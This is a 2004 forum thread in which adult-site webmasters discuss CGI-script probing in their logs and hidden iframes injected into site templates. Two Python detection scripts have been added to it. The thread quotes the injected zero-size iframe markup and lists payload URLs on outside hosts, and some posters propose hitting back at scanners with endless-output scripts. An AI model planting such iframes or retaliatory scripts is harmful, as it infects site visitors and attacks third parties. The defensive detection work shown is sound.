Greenguy's Board


2004-09-08, 08:02 PM   #1
Tino
Are you sure you're an accredited and honored pornographer?
Join Date: Sep 2003
Posts: 61
Is this a hack attempt...

When I log into my server statistics and look at my "pages not found" I see about 500 entries like this:

http://neighbourhoodgirls.com/cgi-bi...gate/count.cgi
http://neighbourhoodgirls.com/cgi/accountcreate.cgi
http://neighbourhoodgirls.com/cgibin/count.cgi
http://neighbourhoodgirls.com/cgi/mgt/accountcreate.cgi
http://neighbourhoodgirls.com/cgi-bi...d.cgi.original
http://neighbourhoodgirls.com/cgi-bi...ate/search.cgi

etc.

Of course I don't have any of those scripts on my site. I take it someone is trying to figure out where my script is located to take control of it somehow, correct?
__________________
Neighbourhoodgirls

2004-09-08, 08:07 PM   #2
RawAlex
Took the hint.
Join Date: Mar 2003
Posts: 5,597
Yes, that is a hack attempt, specifically an attempt to find certain cgi scripts or folders that indicate certain programs are loaded. On positive hits, they will log them and perhaps come back later to explore potential vulnerabilities that they can use to gain access to your system and do what they like.

The most common hack right now is the addition or installation of a 1X1 frame on the bottom of TGPs. That frame loads a toolbar / malware as well as other "features" that you don't want. It uses a known hack to install on IE without permission and without notice.

Keep your eyes open.

Alex
2004-09-08, 08:10 PM   #3
Tino
Are you sure you're an accredited and honored pornographer?
Join Date: Sep 2003
Posts: 61
Thought so. Thanks.

Guess I'll name my scripts something like klj354l5n5f.cgi from now on.
__________________
Neighbourhoodgirls

2004-09-09, 08:52 AM   #4
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
Quote:
Originally posted by Tino
Thought so. Thanks.

Guess I'll name my scripts something like klj354l5n5f.cgi from now on.
always a good idea if possible!

Would you please post a full list of the files/paths they were looking for, Tino?

Also, can you see if each attempted connection is from the same IP? There could be a small chance this person uses a real IP when simply checking sites for known script names like that.


Quote:
The most common hack right now is the addition or installation of a 1X1 frame on the bottom of TGPs. That frame loads a toolbar / malware as well as other "features" that you don't want. It uses a known hack to install on IE without permission and without notice.

Keep your eyes open.

Alex
Anyone who has seen this and can let us know of filenames used or a unique string in the code added to pages please do... to help me scan my servers for it.

Also, does anyone know how this person is gaining access yet? via an insecure script like Tino was being scanned for maybe?
2004-09-09, 10:19 AM   #5
T Pat
You can now put whatever you want in this space :)
Join Date: Aug 2003
Location: Paridise
Posts: 3,244
Not sure if this is what you're asking for, Opti.
This is the crap a hacker added to one of my hubs:

<%TEMPLATE
NAME Text
HTML <a href="http://www.bang-videos.com/?id=50404" target="_blank">##Thumbnails## ##Catagory## Pics ##Description##</a><br />
%>

<iframe src="http://www.ruworld.com/znd/obj.html" width=0 height=0></iframe>

<iframe src="http://www.vesbiz.biz/adverts/05/1.htm" width=0 height=0></iframe>

<IFRAME SRC="http://www.myiframe.biz/acc22/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>
__________________
How To Keep An Asshole In Suspense

I'll Tell You Later
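Opti asked above for a filename or a unique string to scan servers for, and T Pat's snippet shows what the injected frames look like. The following is an added Python example, not code from the thread or from any of the TGP packages mentioned in it: it walks page and template files and reports any iframe that is sized 0x0 or 1x1, hidden by CSS, or pointed at one of the three hosts in T Pat's snippet. The file-extension patterns, the sample page and the host list as a detection indicator are assumptions; the thread does not name the software or its template file names.

```python
"""Find hidden iframes of the kind injected into TGP pages.

Added example, not code from the thread. The extension patterns and the
sample page below are constructed for illustration.
"""
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Hosts quoted in the thread's injected snippet, used here only as indicators.
KNOWN_BAD_HOSTS = {"www.ruworld.com", "www.vesbiz.biz", "www.myiframe.biz"}


def is_tiny(value):
    """True for a width/height a viewer cannot see (0 or 1, with or without px)."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v in ("0", "1")


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are invisible or point at a known-bad host.

    HTMLParser lowercases tag and attribute names, so <IFRAME SRC=...>
    and <iframe src=...> are handled alike, and unquoted values (width=0) work.
    """

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = urlparse(src).hostname or ""
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (is_tiny(a.get("width")) and is_tiny(a.get("height"))) \
            or "display:none" in style or "visibility:hidden" in style
        if host in KNOWN_BAD_HOSTS or hidden:
            self.findings.append({
                "line": self.getpos()[0],   # 1-based line of the tag in the file
                "src": src,
                "host": host,
                "reason": "known host" if host in KNOWN_BAD_HOSTS else "hidden",
            })


def scan_html(text):
    """Return the list of suspicious iframes found in one document."""
    parser = HiddenIframeFinder()
    parser.feed(text)
    parser.close()
    return parser.findings


def scan_tree(root, patterns=("*.html", "*.htm", "*.tpl")):
    """Scan every matching file under `root`; returns {path: findings}.
    The patterns are an assumption; add your TGP software's template extension."""
    hits = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            found = scan_html(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample page: one legitimate visible embed, the three frames from
# T Pat's snippet, and one frame hidden by CSS instead of by size.
SAMPLE_PAGE = """<html><body>
<a href="http://example.com/gallery">Gallery</a>
<iframe src="http://example.com/player" width=320 height=240></iframe>
<iframe src="http://www.ruworld.com/znd/obj.html" width=0 height=0></iframe>
<iframe src="http://www.vesbiz.biz/adverts/05/1.htm" width=0 height=0></iframe>
<IFRAME SRC="http://www.myiframe.biz/acc22/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>
<iframe src="http://example.net/x" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f"line {f['line']}: {f['reason']} iframe -> {f['src']}")
```

Run `scan_tree("/path/to/docroot")` against both the served pages and the template directory: RawAlex notes below that the frames were planted in the templates, so cleaning the rendered pages alone gets undone on the next update.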
2004-09-09, 11:09 AM   #6
RawAlex
Took the hint.
Join Date: Mar 2003
Posts: 5,597
Opti, while I have not seen the actual hack used, I have noticed that all of the people with the iframe thing TP just posted are all using the same TGP software. While I am not sure that it is the CAUSE, I know it is being used as the effect (because the templates are being modified, so when the software runs an update, the iframe junk gets put on every page).

I have some ideas how they are doing it, but I will not speculate in public.

Alex
2004-09-09, 11:41 AM   #7
Linkster
NO! I'm not a female - but being a dragon, I do eat them.
Join Date: Mar 2003
Location: Sex Delta
Posts: 5,084
Since the domains are known and it's pretty easy to look back and see they're hosted on Advancedhosters - why not call them or get some legal people (I'm sure the FBI/DOJ would love to get involved since it involves the same type of stuff they recently busted all of those people for) and have them contact the hosting company - the registrars and emails for those people are pretty easy to get from their whois.
__________________
Pussy Chompers
Porn Links
NSCash
2004-09-09, 01:27 PM   #8
T Pat
You can now put whatever you want in this space :)
Join Date: Aug 2003
Location: Paridise
Posts: 3,244
I tried e-mailing http://www.bang-videos.com
They ignored my e-mail so I guess I will take your advice, Linkster, and see what I can stir up when I get back in town Monday.
__________________
How To Keep An Asshole In Suspense

I'll Tell You Later
2004-09-09, 01:53 PM   #9
DanB
Internet! Is that thing still around?
Join Date: Aug 2004
Location: Atlanta, GA USA
Posts: 5
Now I want to write a script that will temporarily ban IPs that have generated X number of 404s. Right now I allow the user three 404s and on the fourth I redirect them to one of my exit links.

I wonder if my software firewall can have IPs added programmatically. Don't know if I can do it with IIS.
2004-09-09, 08:45 PM   #10
Tino
Are you sure you're an accredited and honored pornographer?
Join Date: Sep 2003
Posts: 61
Quote:
Originally posted by Opti
always a good idea if possible!

Would you please post a full list if the files/paths they were looking for Tino?
Sure - here you go (there are a few more - these are from 2 attempts and down):

http://www.neighbourhoodgirls.com/xxx404.html

Quote:
Originally posted by Opti

Also, can you see if each attempted connect is from the same IP? Could be a small chance this person uses a real IP when simply checking sites for known script names like that.
They did all come from the same IP - here is an example call:

200.48.218.179 - - [06/Sep/2004:00:02:23 -0500] "GET /cgi/mgt/accountcreate.cgi HTTP/1.0" 404 - "http://neighbourhoodgirls.com/cgi/mgt/accountcreate.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
__________________
Neighbourhoodgirls
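The per-IP check Opti asked for and the 404-counting ban DanB described earlier in the thread, as an added Python example rather than anything posted by either of them: it parses Apache combined-format lines like the one Tino quoted, groups 404s by client, and flags any client that exceeds a limit within a sliding time window (DanB's rule: three misses allowed, the fourth trips it). The sample log mixes Tino's real line with constructed ones, and the threshold, the window length and the `Require not ip` output are assumptions; the parser handles Apache's format, not the IIS W3C log format DanB runs.

```python
"""Flag clients that generate bursts of 404s in an Apache combined-format log.

Added example, not code from the thread. Threshold, window and the deny
output format are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_scanners(lines, threshold=3, window=timedelta(minutes=10)):
    """Group 404s by client IP and flag any client with more than `threshold`
    misses inside some `window`-long span (three allowed, the fourth trips it).
    Returns {ip: {"count", "paths", "first", "last"}}."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in misses.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # slide the window start forward until recs[start..end] fits in it
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = {
                    "count": len(recs),
                    "paths": sorted({r["path"] for r in recs}),
                    "first": recs[0]["ts"],
                    "last": recs[-1]["ts"],
                }
                break
    return flagged


def deny_directives(flagged):
    """Apache 2.4 lines for a <RequireAll> block; a host firewall would take the
    same IP list in its own syntax (output format is an assumption)."""
    return [f"Require not ip {ip}" for ip in sorted(flagged)]


# Constructed sample log: Tino's quoted line, the same client walking more of
# the list seconds apart, and an ordinary visitor who only misses a favicon.
SAMPLE_LOG = [
    '200.48.218.179 - - [06/Sep/2004:00:02:23 -0500] "GET /cgi/mgt/accountcreate.cgi HTTP/1.0" 404 - "http://neighbourhoodgirls.com/cgi/mgt/accountcreate.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '200.48.218.179 - - [06/Sep/2004:00:02:24 -0500] "GET /cgi/accountcreate.cgi HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '200.48.218.179 - - [06/Sep/2004:00:02:25 -0500] "GET /cgibin/count.cgi HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '200.48.218.179 - - [06/Sep/2004:00:02:26 -0500] "GET /cgi-bin/count.cgi HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.10 - - [06/Sep/2004:00:05:00 -0500] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Sep/2004:00:05:01 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = find_scanners(SAMPLE_LOG)
    for ip, info in hits.items():
        print(f"{ip}: {info['count']} x 404 between {info['first']} and {info['last']}")
        for p in info["paths"]:
            print("   probed", p)
    print("\n".join(deny_directives(hits)))
```

The sliding window matters: a single visitor who hits a dead link a few times a day never reaches the limit, while a script that walks a list of script names in a few seconds does on its fourth request. Keep the `paths` list from the output; it is the same kind of evidence Tino's xxx404 page gives, and it is what an abuse desk asks for.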

2004-09-09, 09:45 PM   #11
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
if that IP is real... he lives here

http://www.ip2state.com/map.asp?s=ip...&ses=911115812

Lima, Peru, and is using an IP administered by LACNIC (Latin American Names Registry).. A complaint lodged there with a copy to ICANN probably wouldn't hurt. http://lacnic.net/en/


Whois.sc says that IP is handled by
source=dns3.unired.net.pe.; responsible person=hostmaster@unired.net.pe.

http://whois.sc/200.48.218.179

http://www.unired.net.pe/ looks like it's part of a proper telco in Peru, so a complaint to them should help or might at least get some confirmation of whether they think the hacker is really with them or just using a victim's machine or whatever the deal is.

If it's a real IP and this person is in the industry, chances are they have submitted sites to you in the past, if only to test the system.. worth a look if you log IPs, I'd say.


Thanks for the explanation on the iframe insert TP/Alex ... that sounds like less of a problem than I thought at first. Can someone please PM me the script name affected?
2004-09-09, 09:57 PM   #12
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
Quote:
Originally posted by Tino
Sure- here you go(there is a few more- these are from 2 attemps and down):

http://www.neighbourhoodgirls.com/xxx404.html


That looks like a serious effort from someone that has some knowledge..

Any idea if they are targeting you or just randomly scanning adult websites maybe? You don't have a paysite or billing setup on that domain, do you?
2004-09-09, 10:16 PM   #13
Tino
Are you sure you're an accredited and honored pornographer?
Join Date: Sep 2003
Posts: 61
Quote:
Originally posted by Opti
That looks like a serious effort from someone that has some knowledge..

Any idea if they are targeting you or just randomly scanning adult websites maybe? You don't have a paysite or billing setup on that domain, do you?
Nope - the only thing I can imagine is that he/she has been looking for my toplist script.
__________________
Neighbourhoodgirls

2004-09-09, 10:18 PM   #14
Tino
Are you sure you're an accredited and honored pornographer?
Join Date: Sep 2003
Posts: 61
Quote:
Originally posted by Opti
if that IP is real... he lives here

http://www.ip2state.com/map.asp?s=ip...&ses=911115812

Lima, Peru, and is using an IP administered by LACNIC (Latin American Names Registry).. A complaint lodged there with a copy to ICANN probably wouldn't hurt. http://lacnic.net/en/

I was thinking about complaining to LACNIC - but I think legally I wouldn't get very far, since he didn't succeed in anything.
__________________
Neighbourhoodgirls

2004-09-09, 10:22 PM   #15
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
Quote:
Originally posted by TijuanaPat
I tried e-mailing http://www.bang-videos.com
They ignored my e-mail so I guess I will take your advice, Linkster, and see what I can stir up when I get back in town Monday.
This bang-videos site's processing appears to act for them and just 1 other site, a beastie site called zoo philia.com

There is a discussion on this "animal lovers" site about how that site rips off people and is blacklisted by them or some such: ianszoolinks.com/blacklist.htm


I'm thinking complaining directly to these people or their "hosting company" will be useless... and may simply invite more attention from them. Be nice if there was a law enforcement agency interested in internet fraud that adult webmasters felt comfortable approaching with stuff like this...

Causing drama for them with whatever organisation has final responsibility for allocation of the IP block the processing and paysites use would likely be the most effective way to "annoy" them back imho.. but being careful with passwords and minimizing your attractiveness as a target is the best thing to concentrate on imho.
2004-09-09, 10:34 PM   #16
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
Quote:
Originally posted by Tino
I was thinking about complaining to LACNIC - but I think legally I wouldn't get very far, since he didn't succeed in anything.
I think that sort of organisation will take your complaint more seriously than you imagine.. even if they don't even answer you I believe they will at least file it and use it against their customer if the opportunity arises.

In your case, their customer is a major-looking ISP though, so I wouldn't bother either.. But if it was an IP allocated directly to a company that uses it for their own adult sites for example (like I suspect will be the case in TjPat's problem with the iframe people) then I believe complaining to this level of supplier is actually one of the only really effective ways to hurt a baddie, and it doesn't take many people making the effort to complain to get results if the baddie is already pushing the limits with them.... and there aren't many sources they can turn to for new ones if they start to lose IP space suppliers.
2004-09-09, 10:48 PM   #17
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
Quote:
Originally posted by Tino
Nope - the only thing I can imagine is that he/she has been looking for my toplist script.
My guess is they are looking for any opportunity to gather information that will help them guess the password for your processing accounts (if you have them).

As it is looking for so many scripts, I doubt they have exploits for all of them or care about finding just one alone.. they could just be looking for the existence of common products to test if you do dumb things like leave admin passwords at setup defaults or use very common combos like admin/admin too.
2004-09-09, 11:17 PM   #18
RawAlex
Took the hint.
Join Date: Mar 2003
Posts: 5,597
Opti, those scans are VERY common, I get them on almost every domain I own that appears in DMOZ, YAHOO, or Google.

They are looking for certain scripts, especially things with either default passwords or known issues. They catalog the whole pile, and when they need a server to use, they go back through the pile and start more aggressive hack attempts.

What they truly want is access to something that will either allow them to mail, allow them to spread a virus, or run a denial of service attack from.

You should treat these sorts of attempts seriously if you have any of that stuff on your servers. If you really find yourself getting hit hard, you can just have a cgi reply to them with an ENDLESS stream of characters, which should overload their system after a while.

Basically, they are rattling doorknobs to see if anything is unlocked.

Alex
2004-09-09, 11:41 PM   #19
Opti
I Didn't Do It
Join Date: Aug 2003
Location: au
Posts: 795
I know I have owned maybe 10% as many domains as you have.. and had about 1% as many dmoz listings over the years, but I haven't seen this sort of scan before that I can recall.. I have seen strange requests from time to time but that list Tino posted seems pretty heavily targeted toward 3rd party processors' scripts and I've never seen anywhere near that many requests at the same time.

I think I will go on a bit of a security binge; I'm just not really certain I'm safe or even know all potential problems at the moment, and have had this feeling of doom about being attacked for a while now.. if you have a name for a product like that cgi script I think I would like to check it out. And thanks for sharing your knowledge.. extra useful as usual ;-)
2004-09-10, 04:54 AM   #20
BigJohn
Operator! Give me the number for 911!
Join Date: Nov 2003
Location: Left coast rain country
Posts: 130
I see crap like this all the time. I've often toyed with the idea of actually installing scripts for the hackers to find that would play nasty-nasty with them.
__________________
-BigJohn
Promising the moon and delivering!
2004-09-10, 06:05 AM   #21
Robbo
No matter how good you are at something, there's always about a million people better than you
Join Date: Apr 2004
Location: Greenguy County, NY
Posts: 236
Big John, I've thought the same thing! hehe

They may also be using scripts to randomly probe for those files. I get them on domains that have nothing at all to find as well. They are either after passwords or billing info, I imagine. I wouldn't sweat it much unless they seem to be getting on to something.
2004-09-10, 11:31 PM   #22
tickler
If there is nobody out there, that's a lot of real estate going to waste!
Join Date: Dec 2003
Posts: 2,177
Quote:
Originally posted by TijuanaPat
Not sure if this is what you're asking for, Opti.
This is the crap a hacker added to one of my hubs:

<%TEMPLATE
NAME Text
HTML <a href="http://www.bang-videos.com/?id=50404" target="_blank">##Thumbnails## ##Catagory## Pics ##Description##</a><br />
%>

<iframe src="http://www.ruworld.com/znd/obj.html" width=0 height=0></iframe>

<iframe src="http://www.vesbiz.biz/adverts/05/1.htm" width=0 height=0></iframe>

<IFRAME SRC="http://www.myiframe.biz/acc22/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>
The hacks are apparently against Apache servers and some other stuff that they try to insert:
http://www.myiframe.biz/acc22/2Dimen...xploitsEnc.php
http://www.vesbiz.biz/adverts/05/jss/installer.htm

The one is a media player hack.
__________________
Latina Twins, Solo, NN, Hardcore
Latin Teen Cash
2004-09-11, 12:18 AM   #23
RawAlex
Took the hint.
Join Date: Mar 2003
Posts: 5,597
Big John, I got rid of one guy a few years back by having all cgi requests load a very special script that sent ENDLESS amounts of reply data. The thing would just not stop. The actual text was variations on "fuck off scammer hacker" and other nice stuff. It just piled it at them like you ain't never seen. They hit it two or three times and then they NEVER come back.

Most of them store this stuff somewhere on their computers... so it gives them some nice big files to have to look through.

Alex
2004-09-11, 04:43 AM   #24
BigJohn
Operator! Give me the number for 911!
Join Date: Nov 2003
Location: Left coast rain country
Posts: 130
LOL Alex, sweet idea... I might just have to find the time to do something like that
__________________
-BigJohn
Promising the moon and delivering!